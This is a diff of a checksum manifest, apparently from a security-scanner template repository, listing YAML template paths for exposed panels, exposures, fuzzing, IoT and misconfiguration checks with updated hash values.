-http/exposed-panels/xnat-login.yaml:fcbbb11a17811c6b3b40cb4d98a8705a37e5b365 -http/exposed-panels/xoops/xoops-installation-wizard.yaml:98ae56f16055371672d67c9a893db524c62e7c7e -http/exposed-panels/xvr-login.yaml:96f1b8b0482a875b110995a61f4dc85ded44de1a -http/exposed-panels/xweb500-panel.yaml:a3f523cb177fc65c896cfd568ce39a5ae65bb27d -http/exposed-panels/xxljob-panel.yaml:8e2f6366f1ebcb5bc9d519e1adb7ca152a668a99 -http/exposed-panels/yarn-manager-exposure.yaml:06440943949a122619fc11beb0287225f9767e7d -http/exposed-panels/yellowfin-panel.yaml:f9385cd8102778c5bbdb2947a79fc7fc3135cc71 +http/exposed-panels/xibocms-login.yaml:db2a0fd07b24ff96312c80b4f1ce51faeb9da0bc +http/exposed-panels/xnat-login.yaml:af4faa0ea7fc3b8cecd7d0c82de285eaaf0d43b7 +http/exposed-panels/xoops/xoops-installation-wizard.yaml:1aebb50ab2d8b80589c49f14fdaf47197e70c7e6 +http/exposed-panels/xvr-login.yaml:43015eb25b2549bc605e86cfab04e3c722505a4b +http/exposed-panels/xweb500-panel.yaml:ec7a5037b2a4e6550e492529cda3b6a4b70e9e7f +http/exposed-panels/xxljob-panel.yaml:fda73bdbd2b614e2a4027ed7ff94a724019a00b5 +http/exposed-panels/yarn-manager-exposure.yaml:86acccc923cf9783f92e1ab56d392d12657952b7 +http/exposed-panels/yellowfin-panel.yaml:9add013ac73a6c57ec7b7085d6613719e4d9913e http/exposed-panels/yopass-panel.yaml:ecba56804c1bf76c0fb298ab7b79ed5ec66658b5 -http/exposed-panels/yzmcms-panel.yaml:51b409b6fe52cb8e20a5616cd5c9e2753a121f2f -http/exposed-panels/zabbix-server-login.yaml:e04912bb2707c3e34f3c4e99c1e728b4ec7a8621 -http/exposed-panels/zblog-exposed-admin-panel.yaml:96ee492f10b273edd96898363e37f9954f99abe2 +http/exposed-panels/yzmcms-panel.yaml:399d4abbd03103c7b02b68a1651df7807ec91c2f +http/exposed-panels/zabbix-server-login.yaml:eee7d23d3992dd0f44a3335ed8bfa8474ba37067 +http/exposed-panels/zblog-exposed-admin-panel.yaml:c6d0b39eb2ef24b003f464cdeab4705efc871eee http/exposed-panels/zblogphp-panel.yaml:e685ebcc5d060fb75e7cc4b54c03134e6891c65d -http/exposed-panels/zenario-login-panel.yaml:98c11122e6ae84e88073781fa12eaaabe46db54a +http/exposed-panels/zenario-login-panel.yaml:f48d2f158a328813b6e5e730417a000e8d263ad0 http/exposed-panels/zenml-dashboard-panel.yaml:25f442ce4d82a5b696f1e713da67057e5cb405ce -http/exposed-panels/zentao-detect.yaml:1a32b4520a559dadaf7316982a353a84d52e0690 +http/exposed-panels/zentao-detect.yaml:98c2f83ba9b52166866bd645fabd3fef9821bdce http/exposed-panels/zentral-panel.yaml:c38400c4f410e2974291f154ba202f94477c418f -http/exposed-panels/zeroshell-login.yaml:f67d1225880112d034d7e07d35397f13728dd48f -http/exposed-panels/zimbra-web-client.yaml:a637ef806a1542e4f69cbd8ec3d59824e8df7489 -http/exposed-panels/zimbra-web-login.yaml:ba7ac06befac54ae9ef8000f8648720e58fbf5bb -http/exposed-panels/zipkin-exposure.yaml:b19b7a4ef0c894a488028e8ef74662173fed7719 -http/exposed-panels/zoho/manageengine-adaudit.yaml:9b60fb7309a8b6102fc3ab19f289b8db16c7a5c4 -http/exposed-panels/zoho/manageengine-adselfservice.yaml:069129a6a5ceb6fce8c7b62e835a7a058bdcf081 -http/exposed-panels/zoho/manageengine-analytics.yaml:ab4c11e59f76c9a9eafe242999197774258903e9 -http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml:c1e73b69707f84559380d13c3a7e1bfe3a257ebd -http/exposed-panels/zoho/manageengine-applications-manager.yaml:89cf16890f6c7095d98a5ae42216139da1dd9066 -http/exposed-panels/zoho/manageengine-assetexplorer.yaml:28491fbbcf65cb573c5ce36d3bf9ee4e3d0e0cd4 -http/exposed-panels/zoho/manageengine-desktop.yaml:2f221b04e252feb6be38113b9a28e52f7d143ed9 +http/exposed-panels/zeroshell-login.yaml:765ae0e3d905098a0809e0764e622b8c0b296eb8 +http/exposed-panels/zimbra-web-client.yaml:c3c8da32c9607299264fbbbce807114d3a1e54a6 +http/exposed-panels/zimbra-web-login.yaml:7e9d09872df578adba7ec1c2e9f90a7dd241cd5f +http/exposed-panels/zipkin-exposure.yaml:b788f683444a99e71244185811081dde7ed1b546 +http/exposed-panels/zoho/manageengine-adaudit.yaml:7da5416a01c32367eed31e3e386e68bae4dfea67 +http/exposed-panels/zoho/manageengine-adselfservice.yaml:861dbcb7ca03a52bec6fafb91d37c8d6084b0a12 +http/exposed-panels/zoho/manageengine-analytics.yaml:871451a033c2a7a852ccb84e7eda32c6576f8c99 +http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml:799a6b2f0e41db492249c43dd2becb6007795ed2 +http/exposed-panels/zoho/manageengine-applications-manager.yaml:1ae0476555df425feb1b6b4d61134b9373b691ed +http/exposed-panels/zoho/manageengine-assetexplorer.yaml:fda5b89d96373f8b599e67bd5228df762cc57ea0 +http/exposed-panels/zoho/manageengine-desktop.yaml:03ce08abfa94b3abc914574be699fe6da234ac6a http/exposed-panels/zoho/manageengine-keymanagerplus.yaml:0233bf933f016d5339e6ae34f915e777abf33a8a -http/exposed-panels/zoho/manageengine-network-config.yaml:be1caa783f555e355db62bc03689229b8b03c417 -http/exposed-panels/zoho/manageengine-opmanager.yaml:b46b863450ac6b7c7dec2c809ec3338f7162d9d0 -http/exposed-panels/zoho/manageengine-servicedesk.yaml:c9b0110e26d4bf85a51ea2ab345732c85e20b50b -http/exposed-panels/zoho/manageengine-supportcenter.yaml:cbb0dd9c5229545d2d10d0d5a4010571444b89df -http/exposed-panels/zoneminder-login.yaml:0a2b08195e0cf10f76f5cb994032cbe53f7f0796 -http/exposed-panels/zte-panel.yaml:fd3f53f3360b85737b729ee23574d4d315cd1088 +http/exposed-panels/zoho/manageengine-network-config.yaml:9760567e1f73a50e48db276d5cb269ceffc67c84 +http/exposed-panels/zoho/manageengine-opmanager.yaml:059d09a5fc157a5ebf282a42abb04f826b483992 +http/exposed-panels/zoho/manageengine-servicedesk.yaml:22342294013945b2cc9b4a5ef624878d8a74cbee +http/exposed-panels/zoho/manageengine-supportcenter.yaml:859eb144ee9d9cd19d8ea3266c22c0618a8ec7da +http/exposed-panels/zoneminder-login.yaml:09e57667e721cbe7fa66b64e6760b0b62dfa3d7e +http/exposed-panels/zte-panel.yaml:c66ae97828dc9799eae59f1d96438d21ba7718c8 http/exposed-panels/zuul-panel.yaml:ce089d9bc02488dd76c20c76b3fe06abf49ff910 -http/exposed-panels/zyxel/zyxel-firewall-panel.yaml:b83a821abf9e14dcbd6342907311e1208c9ea43a -http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml:2121d953dc84f223c72c045e4ecc11acfb56f24d -http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml:b332ab3787e2a7694efbdd032c24dd55489b3d1d -http/exposed-panels/zyxel-router-panel.yaml:f4588834aa687f35d42351595145dcab619a8036 +http/exposed-panels/zyxel/zyxel-firewall-panel.yaml:141b27ae36185e692e709531571f33aca07d4cd5 +http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml:044dd74c5776097b9e057a7556ad557839455490 +http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml:8babfdb54ca57bcc85bc2eebfecde08889f0b4b2 +http/exposed-panels/zyxel-router-panel.yaml:b954136128d41085443c311792388ecff97d779c http/exposures/apis/aspnet-soap-webservices-asmx.yaml:8183da55dabf139446cbd4ab97aaa32a5747d998 http/exposures/apis/couchbase-buckets-api.yaml:c070ad78e1f11370fd510168c96139509ad392d9 -http/exposures/apis/drupal-jsonapi-user-listing.yaml:6c0d2174c96c125721a03ceaa0ae6fd3bc58e2f0 +http/exposures/apis/drupal-jsonapi-user-listing.yaml:fde7cab80d673763e543fceb7b68375f3f71b78e http/exposures/apis/jeecg-boot-swagger.yaml:f90ea6927d4e5f8dad82d5766129ea8de5ba355a http/exposures/apis/openapi.yaml:61119f5825fa000b6b5965624596a1586399bfa8 http/exposures/apis/redfish-api.yaml:f58214d68ea51e861520589b7b2050ddc9e7426c @@ -4673,7 +4673,7 @@ http/exposures/configs/coremail-config-disclosure.yaml:10c7e12794224ac7f9c81cf3b http/exposures/configs/cypress-web-config.yaml:dd978d1d56bd33cbcf827ae65c59265acd6625cf http/exposures/configs/dbeaver-credentials.yaml:cbd4ab7a04824a87c57dd64ef1c700e5c7ac6e42 http/exposures/configs/debug-vars.yaml:0b108f2c2468d3700a7a837b79eec21e3d060785 -http/exposures/configs/deployment-ini.yaml:333132cbc8a1874f239fed48f924a70752a4a46e +http/exposures/configs/deployment-ini.yaml:b72145a9131e98e3b2f68a4971f2a88078abf666 http/exposures/configs/detect-drone-config.yaml:8dcfc65408172b76a554d1f5970d2c3cb1edb514 http/exposures/configs/django-variables-exposed.yaml:f459d04766a2b8b6cb97e522e0623abc7c3a8b17 http/exposures/configs/docker-compose-config.yaml:c09c54ae8ef8b7eb9d1afea7fe19ef6b2b0169d3 @@ -4829,7 +4829,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5 http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910 http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1 -http/exposures/files/generic-db.yaml:fe6bc1aba6d42bb35a9dd5f8f43a1347f1575e3f +http/exposures/files/generic-db.yaml:d79be7b9bd03b6194734555897ee65c09024b241 http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e @@ -4839,7 +4839,7 @@ http/exposures/files/go-mod-disclosure.yaml:868457891a67709f5681525aa9e1fa81d7ff http/exposures/files/google-api-private-key.yaml:75fa461247606ff2715554666c6282ad3e91daca http/exposures/files/google-services-json.yaml:e3f8a9408fb76a37a7f38d331b6a012c31fd5db8 http/exposures/files/gradle-libs.yaml:ba505cac5c050de7f514aaadde18d09b1a85a154 -http/exposures/files/ht-deployment.yaml:8ef7e6b625ea80a08e6e3aa6af2656852ff4a4d1 +http/exposures/files/ht-deployment.yaml:0da12da8face542bc52e07676f69f71eb5e2b628 http/exposures/files/iceflow-vpn-disclosure.yaml:df66610da725f7f337878ff9399791feb7f4599d http/exposures/files/idea-folder-exposure.yaml:68c0fb53827d015f0f18f127a96bd530d6c2f7a0 http/exposures/files/ioncube-loader-wizard.yaml:f2e446ca4db043d623f719abdb4c498b2ad2267f @@ -4900,7 +4900,7 @@ http/exposures/files/vscode-sftp.yaml:9eac173ccb9924a07164357a8076c588ee4e3211 http/exposures/files/webpack-mix-js.yaml:8788ba6c4f33a8c072c5072d900b6f5d6e38dd09 http/exposures/files/webpack-sourcemap-disclosure.yaml:d18b822392b235f4cadcb08bc513981af5fac317 http/exposures/files/wget-hsts-list-exposure.yaml:43f1de69f66711aa31cc21be45c6c2bd108dd60b -http/exposures/files/wordpress-readme-file.yaml:2927eff2206b0b52b67187bfe5596a7baa4461a2 +http/exposures/files/wordpress-readme-file.yaml:9c56edbad130aa6bc6802f789cc82ee07634dc39 http/exposures/files/wp-cli-exposure.yaml:d9e27d25f01d5b26858e334947530ff034342ada http/exposures/files/ws-ftp-ini.yaml:30c413c6d9b9958236b7b821c6ecfbd5cf67cc43 http/exposures/files/xampp-environment-variables.yaml:0df2f0bc845b5ca2c25308ef4a648f4742ac6bc4 @@ -4927,7 +4927,7 @@ http/exposures/logs/jboss-seam-debug-page.yaml:c748e1d924b75944e21a3b926e6539736 http/exposures/logs/laravel-log-file.yaml:1c9256915860d67aabaccbb36beddf9f1eca7f63 http/exposures/logs/laravel-telescope.yaml:52ec6e31e7704b09600f0386dd049e77828ae0bc http/exposures/logs/lucee-stack-trace.yaml:467fad25796a3cd7ace8de52ce488d3b406b992b -http/exposures/logs/milesight-system-log.yaml:146c8e0e4729e0687e7c0b814942e4f37f60dd98 +http/exposures/logs/milesight-system-log.yaml:077224f3c73b08143ab293b7908603027c38c072 http/exposures/logs/nginx-shards.yaml:c0f921f492ac11aac013022038971c3b584273d3 http/exposures/logs/npm-debug-log.yaml:9cd953efaaf59cf8e0ded9097c2ed6d8aeb33f0c http/exposures/logs/npm-log-file.yaml:5960e35dd675e419ce272dcc6569efc0f3f26762 @@ -5120,24 +5120,24 @@ http/exposures/tokens/zendesk/zendesk-key.yaml:002e66de48b921b1485a90c9ee0b8202d http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a8b850b2efaae638efc02b5d207fe6bc855610e9 http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad22f57bad735 http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb -http/fuzzing/cache-poisoning-fuzz.yaml:f98fed523a1e8b80a6c5c12183c6f072bb81cf5e -http/fuzzing/header-command-injection.yaml:bf0af66d12ef68c553a7a0d496f469788f3d03c3 -http/fuzzing/iis-shortname.yaml:aafbc44fc50e604004bf52f14b83354e24163827 -http/fuzzing/linux-lfi-fuzzing.yaml:71ff764187f634a93d327aaecf04888752d0865d -http/fuzzing/mdb-database-file.yaml:f6bb4e9e482516e6a861cc1efc68063e61778d13 -http/fuzzing/prestashop-module-fuzz.yaml:f75751e154d129d76c87109bc9a219f563db9021 -http/fuzzing/ssrf-via-proxy.yaml:8b57f45fe9d33268b5ae1dcd1a73301a47dfee62 -http/fuzzing/valid-gmail-check.yaml:6aa777a518beca1808b0a2d3426a08a9766e5aae -http/fuzzing/waf-fuzz.yaml:b7597ff989c1bb842050d983a94d315ebe8c5e9c -http/fuzzing/wordpress-plugins-detect.yaml:25ff69ef714a37d38aad14f42997e0b8719a6b34 -http/fuzzing/wordpress-themes-detect.yaml:f6114b69317bccbbf2e4cfcd45352a32c763fbb8 -http/fuzzing/wordpress-weak-credentials.yaml:dc99bb50545e486ea8caf793f91b928d0e47af7b -http/fuzzing/xff-403-bypass.yaml:dd3c8697bff82b88e25b11034f0e789a636b9316 -http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbbc5 -http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25 +http/fuzzing/cache-poisoning-fuzz.yaml:9b3803e001019b347c7c341a6faa42957ef9c2db +http/fuzzing/header-command-injection.yaml:0057de45d4ea4198aef13e374adc884c0fb33679 +http/fuzzing/iis-shortname.yaml:076ebc4308c00703f7de01876acb801812487af8 +http/fuzzing/linux-lfi-fuzzing.yaml:181fb146857877ba81442fa77596f53412f2f009 +http/fuzzing/mdb-database-file.yaml:8fb0cfbc5cfd824d294875264c0f08eb6d6f7931 +http/fuzzing/prestashop-module-fuzz.yaml:28329d1bc8e7144742004b76ad3874f88a95511e +http/fuzzing/ssrf-via-proxy.yaml:725dd4658bed49698144a8ef649e60dc07cbcf4f +http/fuzzing/valid-gmail-check.yaml:80f9fc7898a4bb813333e58efe72e303b3c98b44 +http/fuzzing/waf-fuzz.yaml:a91ed7d88c74c58b8ac0137df7582d4fd1a6d220 +http/fuzzing/wordpress-plugins-detect.yaml:b163fecb1fb43714f3b8cd947f5cb1072bbf6899 +http/fuzzing/wordpress-themes-detect.yaml:c4ca01cc3b526a7db6bb7da8dcc62bc1ed45f7de +http/fuzzing/wordpress-weak-credentials.yaml:993715640e6fafcd4e282872e66f2a67b055b4d9 +http/fuzzing/xff-403-bypass.yaml:7f137a010a5469b88fa1d56b17bceb04e5b176a5 +http/honeypot/citrix-honeypot-detect.yaml:d47879ae6f0be8622416d8e4b8c2447c9501718e +http/honeypot/dionaea-http-honeypot-detect.yaml:0f9298c4f6507013f66016059d6a43fa538be388 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa -http/honeypot/snare-honeypot-detect.yaml:b63d27a24618602947f861b69eec3ceee8c08bd5 -http/honeypot/tpot-honeypot-detect.yaml:d6bba366446a11da0938639a63c137fff9baf522 +http/honeypot/snare-honeypot-detect.yaml:65b624d59f5ff34d314ed47f73c8ea8d0d44a339 +http/honeypot/tpot-honeypot-detect.yaml:99630afc07dee451bf2c6fedbb585164d892c24f http/iot/ampguard-wifi-setup.yaml:3fdb76a85fa7376b4ddef9a2af7f4cfadd9db2fb http/iot/apc-ups-login.yaml:915c40c7c4e581a0636cc99d6d7ac0582f7da117 http/iot/automation-direct.yaml:9b578eb3fea63e67a0c939c9cce372e94ad3de19 @@ -5161,11 +5161,11 @@ http/iot/hue-personal-wireless-panel.yaml:bf80da1db76e38b21a79a2d1c1e606d0d8ae17 http/iot/internet-service.yaml:c9f1cf966aa3cfba926f26bc4d6c08f7420998a4 http/iot/iotawatt-app-exposure.yaml:9127c8ba9a2b0eb2fe9aa16d80e6c4db7e79b8cc http/iot/kevinlab-device-detect.yaml:f720c924dba7c3a9003b2bf59be19a243aaa4def -http/iot/kyocera-printer-panel.yaml:5b08e5c806a53fabb858dcc30eb35788c1140693 +http/iot/kyocera-printer-panel.yaml:2f8fa73bd29061ddaf2e2b03a1c8e87ea56bf6d3 http/iot/liveview-axis-camera.yaml:27770208bc0e8e6cb58a52f715f04451005ed271 http/iot/loytec-device.yaml:a9386283d6c5614c0f8af85d05651d2d98c89183 http/iot/mobotix-guest-camera.yaml:c01218a024c67546ad7ba633208ce64a985fb032 -http/iot/netgear-boarddataww-rce.yaml:2ed1aa424c78d57f9978c72b9f3fa3d6e99b9c08 +http/iot/netgear-boarddataww-rce.yaml:44a5f8bea23fcac7a9fea75250b4ec590260f61b http/iot/netsurveillance-web.yaml:bc37216eb766b14eb44c7450623e6b0be900a35e http/iot/network-camera-detect.yaml:75f24121124cf3a8e5aca711ec2f29d1d857fa39 http/iot/novus-ip-camera.yaml:f14cfb5cff0f616b430dd4fffcc09f8d725c78db @@ -5191,20 +5191,20 @@ http/iot/zebra-printer-detect.yaml:491a007c29769934e37fb4edfe93353464edaad6 http/miscellaneous/addeventlistener-detect.yaml:a9379004a7ea9f28a2cfe60e9d4ddeaec301278a http/miscellaneous/apple-app-site-association.yaml:0c900bfd50a6f29041445996ed33a94d75abe68d http/miscellaneous/aws-ecs-container-agent-tasks.yaml:8d29db7a82337344e379b72bce008157bd4df961 -http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d9e5c7e55 +http/miscellaneous/balada-injector-malware.yaml:b25cc0af2279ac69ab18bc6dffb3cd8fff924170 http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0 -http/miscellaneous/cloudflare-rocketloader-htmli.yaml:b590d6e588eeb9411fbfc27c87fcf6b695ee63f5 +http/miscellaneous/cloudflare-rocketloader-htmli.yaml:2f60681ddf3309e0eb345ad5a43659cbb594815c http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387 http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5 -http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e +http/miscellaneous/defacement-detect.yaml:223568f7feb4a0207941d2ecd2864be96f5c4f27 http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326 -http/miscellaneous/directory-listing.yaml:3d81594572d543440ffe225bf2d06df42c7e214f +http/miscellaneous/directory-listing.yaml:c0c8be4336115438b99745fcbf4953e0e8836c14 http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281 http/miscellaneous/exposed-file-upload-form.yaml:64f23d5b8da7c59b3ec10f035ffe433f26f8d62d http/miscellaneous/external-service-interaction.yaml:55a5e41982df451d077107874414eca191585ba2 http/miscellaneous/firebase-database-extractor.yaml:fe5c0911b8c3dce233fda89c2b074bc4cfa0403c -http/miscellaneous/form-detection.yaml:25b492369f69ff4fa34d36e5c46a70d62099b1ec +http/miscellaneous/form-detection.yaml:03a52bb979b7a8a938d5bd682efcd277c67b8c7f http/miscellaneous/google-floc-disabled.yaml:ecc241b0d5827bfa352c70187b207bfc7250d944 http/miscellaneous/gpc-json.yaml:8e7f285ae1bbc8c256228b8e3b4b26075b5dfd27 http/miscellaneous/htaccess-config.yaml:ed1eded700cac491e2229e59f2e67cb05e79e290 @@ -5212,7 +5212,7 @@ http/miscellaneous/http-trace.yaml:bcf573df3cc054e8b8941963fcfca5a87bbf2af3 http/miscellaneous/joomla-htaccess.yaml:2cb861905f21740d8f8a27d71f7658e7926c9c66 http/miscellaneous/joomla-manifest-file.yaml:5e55465e13395a1e9c72323979f1078b4a585cc7 http/miscellaneous/maxforwards-headers-detect.yaml:574c7ca7130e895e14c9cdbb805760591011ddda -http/miscellaneous/microsoft-azure-error.yaml:bfa3c53d4023d524a09ba3565bd3bf63204ac58a +http/miscellaneous/microsoft-azure-error.yaml:acbfb88e12e68769b3d301a0cb2707240f7b7df1 http/miscellaneous/moodle-changelog.yaml:9dbf59caabecc08967456fa3986046e33f4dbf43 http/miscellaneous/netflix-conductor-version.yaml:31ad2c649ff4aa0703a5c7cd4e36d2245a8993e0 http/miscellaneous/ntlm-directories.yaml:8d52b0df9375267f6ba7840037a48a96cb971dda @@ -5298,7 +5298,7 @@ http/misconfiguration/aws/aws-redirect.yaml:3eae321734d805abec1fdc57bb8d11050410 http/misconfiguration/aws/aws-s3-explorer.yaml:8ecb526ca030871303b3e3f0349edaf292f30f55 http/misconfiguration/aws/aws-xray-application.yaml:e7ec644ccf2a75882aeace1f7192b1bf5ba62db1 http/misconfiguration/aws/awstats-listing.yaml:ded98212b09190410c3fa3186d1fb106d0f1c07d -http/misconfiguration/aws/cdn-cache-poisoning.yaml:80d254f34c2ac1ee4073c07ecb6c4c5f846e59c6 +http/misconfiguration/aws/cdn-cache-poisoning.yaml:9e33fb0edc81bd01d17465fef726d792b1496043 http/misconfiguration/bitbucket-auth-bypass.yaml:df9b1e0476b0f347aad3dfbfd8a5c1fde1cabc2b http/misconfiguration/bitbucket-public-repository.yaml:da10f49db5827358dc01a342a787f86e0ebc26d4 http/misconfiguration/blackbox-exporter-metrics.yaml:e1ea25cf9e00b6ea4778e8e91e0e1642a828ab88 @@ -5323,7 +5323,7 @@ http/misconfiguration/command-api-explorer.yaml:ab22381f1611d06739015ed9ed6d8762 http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b1b0fb3a0f16b90760a93b http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0 http/misconfiguration/cookies-without-httponly-secure.yaml:96433be16faef9b269fa66484b578933815e1e51 -http/misconfiguration/corebos-htaccess.yaml:c292dd25e289347ac281d4ce493839827da70784 +http/misconfiguration/corebos-htaccess.yaml:2b5a65fe11a6d881c1ff86d15b4c7d2100d1ca4a http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce http/misconfiguration/database-error.yaml:dc9ac279976c76b9957baf5076fccd7722d1c9ce @@ -5336,14 +5336,14 @@ http/misconfiguration/deos-openview-admin.yaml:51a5586a8abec23b8177b2ab9a3bdfe9d http/misconfiguration/dgraph-dashboard-exposure.yaml:f78d8b451116601b9669874f446e1e0288c0200b http/misconfiguration/django-debug-detect.yaml:e7c45908268a0883ef221e205124b251307d5a64 http/misconfiguration/dlink-config-dump.yaml:a03aa2655a8a532b17f35a3359a8619cab72b3d2 -http/misconfiguration/dlink-unauth-cgi-script.yaml:e2461bf769dc0ad41f83df9c7d2f75e854abaa69 +http/misconfiguration/dlink-unauth-cgi-script.yaml:96c79ffc2b1266ef3f3fad1ab32a5478cad13c46 http/misconfiguration/docker-daemon-exposed.yaml:840bdb31f81cbeaa2b38bc57b6c1a51cc6007946 http/misconfiguration/docker-registry.yaml:5c7611723d46851a846d043b8fca50d505e5870f http/misconfiguration/docmosis-tornado-server.yaml:f1b6f28d042655fb76f80a329f1d252156dd1e88 -http/misconfiguration/dont-panic-traceback.yaml:192722987304c72b7a093ab6eb1ec3ffe4985c1a -http/misconfiguration/doris-dashboard.yaml:bb6e1b170aec39489117c28663f92f97df6f09c5 +http/misconfiguration/dont-panic-traceback.yaml:d4dc7957fbb613b6a26456be141db3638bf33ce8 +http/misconfiguration/doris-dashboard.yaml:ac533787c4b5ce21be55590f95991ba68b6de0f2 http/misconfiguration/druid-monitor.yaml:730666deb48b9f1f6f12affc470425c39e0e9429 -http/misconfiguration/drupal/drupal-user-enum-ajax.yaml:dcd541d6927e9930c8f13cbe69c72c1f48a3b44c +http/misconfiguration/drupal/drupal-user-enum-ajax.yaml:69e9b7dc67a0cfc50a3b955da17be96925d7fa74 http/misconfiguration/drupal/drupal-user-enum-redirect.yaml:2ebce6868f807bb1ebc41becb9583a2db7499164 http/misconfiguration/dynamic-container-host.yaml:4537d6cdaa991356fe13f32d4b8d47c8d771a2cc http/misconfiguration/ec2-instance-information.yaml:1f8a639965672728ca7148b729766c2428f1309b @@ -5364,13 +5364,13 @@ http/misconfiguration/exposed-service-now.yaml:6caed03d33008653ade2f82a74d9f12f9 http/misconfiguration/exposed-sqlite-manager.yaml:7f08ab3721ac74706849b5832190619910514591 http/misconfiguration/express-stack-trace.yaml:5d6a09415331603b6718bb7b766f90606672419b http/misconfiguration/feiyuxing-info-leak.yaml:8283a5c83d32a5290bfb243fa629e47e8aecdadf -http/misconfiguration/filebrowser-unauth.yaml:b4450c077dd249ca2d889ecfc7b0414fa17835d1 +http/misconfiguration/filebrowser-unauth.yaml:4813d29aa9f7ec3b16e4c89b5d2c9ea63d083d41 http/misconfiguration/flask-redis-docker.yaml:884961c3e4b03b5cff631eae034ce3add285e676 http/misconfiguration/formalms-install.yaml:c81cf4919398991aef477d82b3ff17742f7d2280 http/misconfiguration/front-page-misconfig.yaml:43a1c8208f0ac3863a17fa06b8fe9c014fbf8a6a http/misconfiguration/fusionauth-admin-setup.yaml:a0bcf30e5ef642af46bb01a7135a26c24d894dfc http/misconfiguration/ganglia-cluster-dashboard.yaml:f08a3e1c593d51e030d3d0960a344332336967e3 -http/misconfiguration/genieacs-default-jwt.yaml:cfef56c8756e7c941c809cf7cb521d8c3b152f0c +http/misconfiguration/genieacs-default-jwt.yaml:91fa5caa75e95c013fc03fca4a9078ab577461d0 http/misconfiguration/git-web-interface.yaml:333bb590dfc56d41893147f01b0d0a01adaa4cc4 http/misconfiguration/gitea-public-signup.yaml:11e6176dc409205dd8e207f6f6abe01ef98103b0 http/misconfiguration/gitlab/gitlab-api-user-enum.yaml:d74d4349c1e6c0848273d86a5514e931566f6b09 @@ -5394,7 +5394,7 @@ http/misconfiguration/graphql/graphql-field-suggestion.yaml:e3980e92406e7b5a055f http/misconfiguration/graphql/graphql-get-method.yaml:351010e26b4c9e8537768bacab9488197d306486 http/misconfiguration/graphql/graphql-playground.yaml:24366b060558b81457a709e43493c49268d517b6 http/misconfiguration/grav-register-admin.yaml:af26649890037862b4b68606f2111ba6e301fa05 -http/misconfiguration/h2o/h2o-arbitary-file-read.yaml:7fa5869c7a7fc4c1b1629879a9b0bb9d17a1f729 +http/misconfiguration/h2o/h2o-arbitary-file-read.yaml:4a1c533f314b0c900c99524399e6ac64a30a49c6 http/misconfiguration/h2o/h2o-dashboard.yaml:7978671f956c5d5643432559f8571185103d7500 http/misconfiguration/hadoop-unauth-rce.yaml:c10cd550c98774bea2cc2bffaea35fdeed862768 http/misconfiguration/haproxy-exporter-metrics.yaml:e640ba6dd0c65cb0dfde519d3b32372b16f1ab63 @@ -5408,10 +5408,10 @@ http/misconfiguration/hp/unauthorized-hp-printer.yaml:960dd267c9ce3fe43452ea0d5e http/misconfiguration/hp/unauthorized-printer-hp.yaml:69f3ee3a5ae28923c962d7e2b23a0deb5e824611 http/misconfiguration/hpe-system-management-anonymous.yaml:82910902ebfef5f84f465fa13c5dcbd83572426a http/misconfiguration/http-missing-security-headers.yaml:62e00bd5126dbd778c766aa3bb0bd1f2fc546006 -http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d676e592c00e +http/misconfiguration/https-to-http-redirect.yaml:b5ef7bb8b890031170e1bd6edc91149c54357ed3 http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463 http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1 -http/misconfiguration/imgproxy-unauth.yaml:2eb18535d095cf898aa3cd76128382ff8e92acff +http/misconfiguration/imgproxy-unauth.yaml:440549c41db83425d648c32a32693f9612586f94 http/misconfiguration/installer/activecollab-installer.yaml:842f496ce5d4b2c2dc3eed0109a75a5c2cd096a3 http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421 http/misconfiguration/installer/akeeba-installer.yaml:56fc3c8f70ae91e8cb4207b97c0b088a845537f4 @@ -5443,7 +5443,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3 